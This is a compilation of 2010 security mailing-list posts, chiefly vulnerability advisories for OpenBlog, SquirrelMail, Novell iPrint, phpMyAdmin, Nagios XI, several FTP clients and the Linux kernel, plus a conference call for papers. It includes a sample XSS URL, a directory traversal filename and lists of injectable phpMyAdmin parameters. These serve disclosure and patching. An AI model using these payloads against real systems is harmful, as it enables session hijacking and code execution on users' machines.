The most dangerous vulnerability resides on session module of OpenBlog.
Exploiting this vulnerability, hacker can sign in a normal user' account but
obtain administrator' privileges. This is due to the weakness in user's
rights checking and authenticating mechanism, resulting in the high
possibility of faking administrators' privileges.   

Besides, Bkis also found some XSS and CSRF vulnerabilities on the following
OpenBlog's functions: 

XSS holes are found on the following modules: 
-   Create a new post 
-   Edit a post
-   Create a new page

Because these modules' input variables are not adequately checked and
filtered, hacker might insert his code into the path's links. If a user
logins to his Blog and clicks the link, hacker's malicious code (JavaScript)
will be executed, leading to the loss of user's personal information saved
on the browser.  

CSRF vulnerabilities are found on the following modules: 
-   Edit an user
-   Setting
-   Templates
-   Disable/Enable Sidebar  
-   Feed settings
-   Bookmarking
-   New post
-   Edit a post
-   Delete a post
-   New page
-   Edit a page
-   Delete a page
-   New navigation item
-   Edit a navigation item
-   New link
-   Edit a link
-   Delete a link
-   New category
-   Edit a category
-   Delete a category
-   Delete a comment
-   Delete an user

OpenBlog does not require user's confirmation when performing the above
functions. Therefore, users might be tricked into performing unwanted
actions without their consent, like clicking faulty links, etc.
Specifically, hacker might fool Blog's administrators into deleting, editing
the posts on the Blog.

3. Solution

Rating the vulnerability as critical, Bkis recommends organizations,
individuals using OpenBlog be cautious with links of unknown origins. At the
same time, users should keep themselves updated with the developer's
information to get timely update.


--
Bkis (www.bkis.com)
Blog (blog.bkis.com)

[ MDVSA-2010:158 ] squirrelmail

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:158
 http://www.mandriva.com/security/
 ___

 Package : squirrelmail
 Date: August 23, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in squirrelmail:
 
 functions/imap_general.php in SquirrelMail before 1.4.21 does not
 properly handle 8-bit characters in passwords, which allows remote
 attackers to cause a denial of service (disk consumption) by making
 many IMAP login attempts with different usernames, leading to the
 creation of many preferences files (CVE-2010-2813).
 
 This update provides squirrelmail 1.4.21, which is not vulnerable to
 this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2813
 ___

 Updated Packages:

 Corporate 4.0:
 89ba0e4278ea6e087736ae48799b4254  
corporate/4.0/i586/squirrelmail-1.4.21-0.1.20060mlcs4.noarch.rpm
 f203b9f964a9c2ece1502e2096b2fac7  
corporate/4.0/i586/squirrelmail-ar-1.4.21-0.1.20060mlcs4.noarch.rpm
 3c5fff13b0202b27968f3e3a850fcb7f  
corporate/4.0/i586/squirrelmail-bg-1.4.21-0.1.20060mlcs4.noarch.rpm
 48bebcbed19831db900aab396de0bf8b  
corporate/4.0/i586/squirrelmail-bn-bangladesh-1.4.21-0.1.20060mlcs4.noarch.rpm
 10d43734ce8163e27c882e209fc785ff  
corporate/4.0/i586/squirrelmail-bn-india-1.4.21-0.1.20060mlcs4.noarch.rpm
 38f5d99823cec79db6e5857e1ff7ba07  
corporate/4.0/i586/squirrelmail-ca-1.4.21-0.1.20060mlcs4.noarch.rpm
 42ced5fa4f5b8d650c730f170af8af83  
corporate/4.0/i586/squirrelmail-cs-1.4.21-0.1.20060mlcs4.noarch.rpm
 5f3e04f5b7a96564c1a862ca6e48adc5  
corporate/4.0/i586/squirrelmail-cy-1.4.21-0.1.20060mlcs4.noarch.rpm
 c1d2b6ccfd1eda17724a24558b4c3b66  
corporate/4.0/i586/squirrelmail-cyrus-1.4.21-0.1.20060mlcs4.noarch.rpm
 c4ea6f45deb6c166e885f3fc554da996  
corporate/4.0/i586/squirrelmail-da-1.4.21-0.1.20060mlcs4.noarch.rpm
 c008a788df89e860d415946fdda72a3c  
corporate/4.0/i586/squirrelmail-de-1.4.21-0.1.20060mlcs4.noarch.rpm
 736ecd5fa3a229da787e668979e904b5  
corporate/4.0/i586/squirrelmail-el-1.4.21-0.1.20060mlcs4.noarch.rpm
 2903f7a2e4261d845c9b5189eb608386  
corporate/4.0/i586/squirrelmail-es-1.4.21-0.1.20060mlcs4.noarch.rpm
 69a1299f11393e3cb8a5a06cece2f91f  
corporate/4.0/i586/squirrelmail-et-1.4.21-0.1.20060mlcs4.noarch.rpm
 d1df847877e636365bc7f627bbdf3858  
corporate/4.0/i586/squirrelmail-eu-1.4.21-0.1.20060mlcs4.noarch.rpm
 345dd0cb7810dcee94854cf7a090d4f3  
corporate/4.0/i586/squirrelmail-fa-1.4.21-0.1.20060mlcs4.noarch.rpm
 9e2c37a5f4d35eff430da490d90ca5f7  
corporate/4.0/i586/squirrelmail-fi-1.4.21-0.1.20060mlcs4.noarch.rpm
 71be5ff8b164e87e0719cbf21134f244  
corporate/4.0/i586/squirrelmail-fo-1.4.21-0.1.20060mlcs4.noarch.rpm
 268f1d6a6e73918bb0343ffc46a8841b  
corporate/4.0/i586/squirrelmail-fr-1.4.21-0.1.20060mlcs4.noarch.rpm
 2dd5cc33a4a63dc509fda7648d7522f4  
corporate/4.0/i586/squirrelmail-fy-1.4.21-0.1.20060mlcs4.noarch.rpm
 9f5a7c258f9d6bd102b6b93a73c6836e  
corporate/4.0/i586/squirrelmail-he-1.4.21-0.1.20060mlcs4.noarch.rpm
 2ca62ca3db9ca0fcc350c497488e9cf5  
corporate/4.0/i586/squirrelmail-hr-1.4.21-0.1.20060mlcs4.noarch.rpm
 15671592eb8e3503f2bf46dc8c8030b9  
corporate/4.0/i586/squirrelmail-hu-1.4.21-0.1.20060mlcs4.noarch.rpm
 7696e73a26940c4c0d2918c1d1517ce3  
corporate/4.0/i586/squirrelmail-id-1.4.21-0.1.20060mlcs4.noarch.rpm
 8fc9c19902708b28848da7db058ea10b  
corporate/4.0/i586/squirrelmail-is-1.4.21-0.1.20060mlcs4.noarch.rpm
 5e0ba98ba97bb89d8281a759629b8fca  
corporate/4.0/i586/squirrelmail-it-1.4.21-0.1.20060mlcs4.noarch.rpm
 3e7e3835a601f82bb8801ec397d0537a  
corporate/4.0/i586/squirrelmail-ja-1.4.21-0.1.20060mlcs4.noarch.rpm
 206caedb71bef79fccb08775af109d95  
corporate/4.0/i586/squirrelmail-ka-1.4.21-0.1.20060mlcs4.noarch.rpm
 c571adc8677f31c256a1b2bd4650151c  
corporate/4.0/i586/squirrelmail-km-1.4.21-0.1.20060mlcs4.noarch.rpm
 e5503d9ed93be15ef2cb26e2cd3d650f  
corporate/4.0/i586/squirrelmail-ko-1.4.21-0.1.20060mlcs4.noarch.rpm
 36087440e023d1ccc50f0bed5009682c  
corporate/4.0/i586/squirrelmail-lt-1.4.21-0.1.20060mlcs4.noarch.rpm
 d03b3857e69219cbc058500c33ac12a9  
corporate/4.0/i586/squirrelmail-lv-1.4.21-0.1.20060mlcs4.noarch.rpm
 f3dc3244d85170fffa134b7922a7fcfa  
corporate/4.0/i586/squirrelmail-mk-1.4.21-0.1.20060mlcs4.noarch.rpm
 6e35e85c0a59271d7d88efa5fdd84d96  
corporate/4.0/i586/squirrelmail-ms-1.4.21-0.1.20060mlcs4.noarch.rpm
 354299b5ce498349a4a74dbac10a90e0  
corporate/4.0/i586/squirrelmail-nb-1.4.21-0.1.20060mlcs4.noarch.rpm
 ca07a83aa98347f04eb787d5ddc9359c  
corporate/4.0/i586/squirrelmail-nl-1.4.21-0.1.20060mlcs4.noarch.rpm
 6b43e

Secunia Research: Novell iPrint Client "call-back-url" Buffer Overflow Vulnerability

[Secunia Research]

== 

 Secunia Research 20/08/2010

  -  Novell iPrint Client "call-back-url" Buffer Overflow  -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* Novell iPrint Client 5.42

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

"Novell iPrint extends print services securely across multiple 
networks and operating systems. Using proven Internet technologies, 
iPrint transforms your Novell Distributed Print Services™ (NDPS®) 
printers into Net-enabled printers, making all your printing resources
instantly accessible with a Web browser and a few mouse clicks".

Product Link:
http://www.novell.com/products/openenterpriseserver/iprint.html

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Novell iPrint 
Client, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused by a boundary error in the handling of the
"call-back-url" parameter value for a "op-client-interface-version" 
operation where the "result-type" parameter is set to "url". This can
be exploited to cause a stack-based buffer overflow via an overly long
"call-back-url" parameter value.

Successful exploitation allows execution of arbitrary code when a user
visits a malicious website.

== 
5) Solution 

Update to version 5.44.

== 
6) Time Table 

03/08/2010 - Vendor notified.
03/08/2010 - Vendor response.
16/08/2010 - Vendor provides status update.
20/08/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1527 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-104/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

Directory Traversal in FTPGetter

[advisory]

Vulnerability ID: HTB22567
Reference: http://www.htbridge.ch/advisory/directory_traversal_in_ftpgetter.html
Product: FTPGetter
Vendor: FTPGetter Team ( http://www.ftpgetter.com/ ) 
Vulnerable Version: 3.51.0.05 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
file named as "..\..\..\..\..\..\..\somefile.exe".

By tricking a user to download a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into a user's Startup folder to execute 
malicious code when the user logs on.

Nagios XI Login XSS

[Adam Baldwin]

 Nagios XI Login XSS

Advisory ID: NGENUITY-2010-007

Vulnerability Information
Class: Cross-Site Scripting (XSS)

Software Description
Nagios XI is the commercial / enterprise version of the open source
Nagios project.

Vulnerability Description
The login page for the Nagios XI management interface prior to version
2009R1.3 is vulnerable to cross-site scripting (XSS). This vulnerability
does not require the victim to be authenticated. This vulnerability was
originally thought to be addressed in version 2009R1.2C.

All the parameters of the login page are vulnerable to injection and
execution of JavaScript. This does not require authentication, but if
the user is authenticated can provide a reasonably easy way to do
whatever actions you want as the Admin user (and negates CSRF protection
that has recently been implemented).

Vendor recommends upgrading to version 2009R1.3 or later.


Technical Description
Here is a non-malicious example. The input after login.php is inserted
into the permalink_base variable without being sanitized.

http://example.com/nagiosxi/login.php?%22;alert%281%29;//


Credits
This vulnerability was discovered by Adam Baldwin

Original Advisory
http://ngenuity-is.com/advisories/2010/aug/19/nagios-xi-login-xss/

phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability

[YGN Ethical Hacker Group]

==
 phpMyAdmin 3.3.5 / 2.11.10 <= Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The phpMyAdmin web application was vulnerable to Cross Site Scripting
vulnerability.


2. PRODUCT DESCRIPTION

phpMyAdmin is a free software tool written in PHP intended to handle
the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL.
The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations,
indexes, users, permissions, etc), while you still have the ability to
directly execute any SQL statement.


3. VULNERABILITY DESCRIPTION

Some URLs in phpMyAdmin do not properly escape user inputs that lead
to cross site scripting vulnerability.
For more information about this kind of vulnerability, see OWASP Top
10 - A2, WASC-8 and
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting').


4. VERSIONS AFFECTED

phpMyAdmin 3.3.5 and lower
phpMyAdmin 2.11.10  and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_sql.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_sql.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_structure.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/db_structure.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_databases.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_databases.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_privileges.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/server_privileges.php-02.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/sql.php-01.jpg
http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.3.5/xss/sql.php-02.jpg

And full list of URLs (of both  unexploitable/exploitable)
that fail to html escape user inputs:

UR: http://target/phpmyadmin/db_search.php
Affected Parameter(s):  field_str

URL: http://target/phpmyadmin/db_sql.php
Affected Parameter(s):  QUERY_STRING, delimiter

URL: http://target/phpmyadmin/db_structure.php
Affected Parameter(s): sort

URL:  http://target/phpmyadmin/js/messages.php
Affected Parameter(s): db

URL: http://target/phpmyadmin/server_databases.php
Affected Parameter(s): sort_by

URL: http://target/phpmyadmin/server_privileges.php
Affected Parameter(s): QUERY_STRING, checkprivs, dbname,
pred_tablename, selected_usr[], tablename , username

URL: http://target/phpmyadmin/setup/config.php
Affected Parameter(s): DefaultLang

URL: http://target/phpmyadmin/sql.php
Affected Parameter(s): QUERY_STRING, cpurge, goto,purge,purgekey,table,zero_rows

URL: http://target/phpmyadmin/tbl_replace.php
Affected (Dynamic) Parameter(s):
fields[multi_edit][0][f7235a61fdc3adc78d866fd8085d44db],
fields_name[multi_edit][0][349e686330723975502e9ef4f939a5ac]


6. IMPACT

Attackers can compromise currently logged-in user session and inject
arbitrary SQL statements (CREATE,INSERT,UPDATE,DELETE)
via crafted XSS payloads.


7. SOLUTION

Upgrade to phpMyAdmin 3.3.5.1 or 2.11.10.1


8. VENDOR

phpMyAdmin (http://www.phpmyadmin.net)


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

08-09-2010: vulnerability discovered
08-10-2010: notified vendor
08-20-2010: vendor released fix
08-20-2010: vulnerability disclosed


11. REFERENCES

Vendor Advisory URL:
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/phpmyadmin/[phpmyadmin-3.3.5]_cross_site_scripting(XSS)
Previous Release: http://www.phpmyadmin.net/home_page/security/PMASA-2008-6.php
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [08-20-2010]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

Directory Traversal in 3D FTP Client

[advisory]

Vulnerability ID: HTB22565
Reference: 
http://www.htbridge.ch/advisory/directory_traversal_in_3d_ftp_client.html
Product: 3D FTP Client
Vendor: SiteDesigner Technologies, Inc. ( http://3dftp.com/3dftp.htm ) 
Vulnerable Version: 9.0 build 2 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
file named as "..\..\..\..\..\..\..\somefile.exe".

By tricking a user to download a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into a user's Startup folder to execute 
malicious code when the user logs on.

Ruxcon 2010 Final Call For Papers

[cfp]

RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual 
Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of 
November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. 
Ruxcon aspires to bring together the individual talents of the best and the 
brightest security folk within the Aus-Pacific region, through live 
presentations, activities, and demonstrations.

Ruxcon's unique approach to running a security conference ensures that the 
conference is accessible to all levels of the security industry. Ruxcon aims to 
be the most interesting, thought provoking, and relevant information security 
conference in Australia.

The conference is held over two days in a relaxed atmosphere, allowing 
attendees to enjoy themselves whilst networking within the community and 
expanding their knowledge of security.

Live presentations and activities will cover a full range of defensive and 
offensive security topics, varying from previously unpublished research to 
required reading for the security community.

For more information, please visit http://www.ruxcon.org.au

Presentation Information

Presentations will be 50 minutes in length, and should be fully supplemented 
with slides and any other relevant material.

Presentation Submissions

Ruxcon would like to invite people who are interested to submit a presentation.

Topics of interest include, but are not limited to:

   * Mobile Device Security
   * Virtualisation, Hypervisor and Cloud Security
   * Malware Analysis
   * Reverse Engineering
   * Exploitation Techniques
   * Rootkit Development
   * Code Analysis
   * Forensics and Anti-Forensics
   * Embedded Device Security
   * Web Application Security
   * Network Traffic Analysis
   * Wireless Network Security
   * Cryptography and Cryptanalysis
   * Social Engineering
   * Law Enforcement Activities
   * Telecommunications Security (SS7, 3G/4G, GSM, VOIP, etc)

Submissions should thoroughly outline your desired presentation subject. 
Accompanying your submission should be the slides you intend to use or a 
detailed paper explaining your subject.

If you have any enquiries about submissions, or would like to make a 
submission, please send an e-mail to
presentati...@ruxcon.org.au.

The deadline for submissions is the 10th of October.

If approved we will additionally require:

  1. A brief personal biography (between 2-5 paragraphs in length).
  2. A description on your presentation (between 2-5 paragraphs in length).

Contact Details

Presentation Submissions: presentati...@ruxcon.org.au
General Enquiries: rux...@ruxcon.org.au

Directory Traversal in AutoFTP Manager

[advisory]

Vulnerability ID: HTB22566
Reference: 
http://www.htbridge.ch/advisory/directory_traversal_in_autoftp_manager.html
Product: AutoFTP Manager
Vendor: DeskShare ( http://www.deskshare.com/afm.aspx ) 
Vulnerable Version: 4.31 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Fixed by Vendor
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
file named as "..\..\..\..\..\..\..\somefile.exe".

By tricking a user to download a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into a user's Startup folder to execute 
malicious code when the user logs on.

Solution: Upgrade to the most recent version

[SECURITY] [DSA 2094-1] New Linux 2.6.26 packages fix several issues

[dann frazier]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-2094-1secur...@debian.org
http://www.debian.org/security/   dann frazier
August 19, 2010 http://www.debian.org/security/faq
- --

Package: linux-2.6
Vulnerability  : privilege escalation/denial of service/information leak
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2009-4895 CVE-2010-2226 CVE-2010-2240 CVE-2010-2248
 CVE-2010-2521 CVE-2010-2798 CVE-2010-2803 CVE-2010-2959
 CVE-2010-3015
Debian Bug(s)  : 589179
 
Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-4895

Kyle Bader reported an issue in the tty subsystem that allows local
users to create a denial of service (NULL pointer dereference).

CVE-2010-2226

Dan Rosenberg reported an issue in the xfs filesystem that allows local
users to copy and read a file owned by another user, for which they
only have write permissions, due to a lack of permission checking in the
XFS_SWAPEXT ioctl.

CVE-2010-2240

Rafal Wojtczuk reported an issue that allows users to obtain escalated
privileges. Users must already have sufficient privileges to execute or
connect clients to an Xorg server.

CVE-2010-2248

Suresh Jayaraman discovered an issue in the CIFS filesystem. A malicious
file server can set an incorrect "CountHigh" value, resulting in a
denial of service (BUG_ON() assertion).

CVE-2010-2521

Neil Brown reported an issue in the NFSv4 server code. A malicious client
could trigger a denial of service (Oops) on a server due to a bug in
the read_buf() routine.

CVE-2010-2798

Bob Peterson reported an issue in the GFS2 file system. A file system
user could cause a denial of service (Oops) via certain rename
operations.

CVE-2010-2803

Kees Cook reported an issue in the DRM (Direct Rendering Manager)
subsystem. Local users with sufficient privileges (local X users
or members of the 'video' group on a default Debian install) could
acquire access to sensitive kernel memory.

CVE-2010-2959

Ben Hawkes discovered an issue in the AF_CAN socket family. An integer
overflow condition may allow local users to obtain elevated privileges.

CVE-2010-3015

Toshiyuki Okajima reported an issue in the ext4 filesystem. Local users
could trigger a denial of service (BUG assertion) by generating a specific
set of filesystem operations.

This update also includes fixes a regression introduced by a previous
update. See the referenced Debian bug page for details.

For the stable distribution (lenny), this problem has been fixed in
version 2.6.26-24lenny1.

We recommend that you upgrade your linux-2.6 and user-mode-linux
packages.

The following matrix lists additional source packages that were
rebuilt for compatibility with or to take advantage of this update:

 Debian 5.0 (lenny)
 user-mode-linux 2.6.26-1um-2+24lenny1

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, armel, hppa, i386, ia64, mipsel, 
powerpc, s390 and sparc.
Updates for arm and mips will be released as they become available.

Source archives:

  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-24lenny1.dsc
Size/MD5 checksum: 5778 0ce8e36117eece3c4b469d73be862cd3
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz
Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-24lenny1.diff.gz
Size/MD5 checksum:  7952972 d3496a509cd9024910b5ee2cad4b5c70

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-24lenny1_all.deb
Size/MD5 checksum: 48766186 ae5653c62cd9e1631c02af9ebab6a93d
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-24lenny1_all.deb
Size/MD5 checksum:  4630140 1ae9b5193a604a5943cbe3580d5f8191
  
http://security.debian.org/pool/updates/main/

Re: Web Tool Announcement: ismymailsecure.com

[Chuck Swiger]

Hi, Holger--

On Aug 18, 2010, at 2:59 AM, Holger Rabbach wrote:
> I am happy to announce the immediate availability of a web based email
> security testing tool at http://www.ismymailsecure.com.  [ ... ]
> If you have any concerns about having to enter a full email address,
> please be advised that this address is never stored anywhere. The only
> reason that the site asks for an email address rather than a domain is
> that it makes it easier for end-users to enter the correct information.
> Feel free to enter anything you like as the left hand part of the
> address, as it will be immediately stripped off by the tool anyway.

Your tool doesn't implement RFC-822 (2822/3696) address-checking properly; it 
returns:

  "cswiger+t...@mac.com is an invalid email address"

Regards,
-- 
-Chuck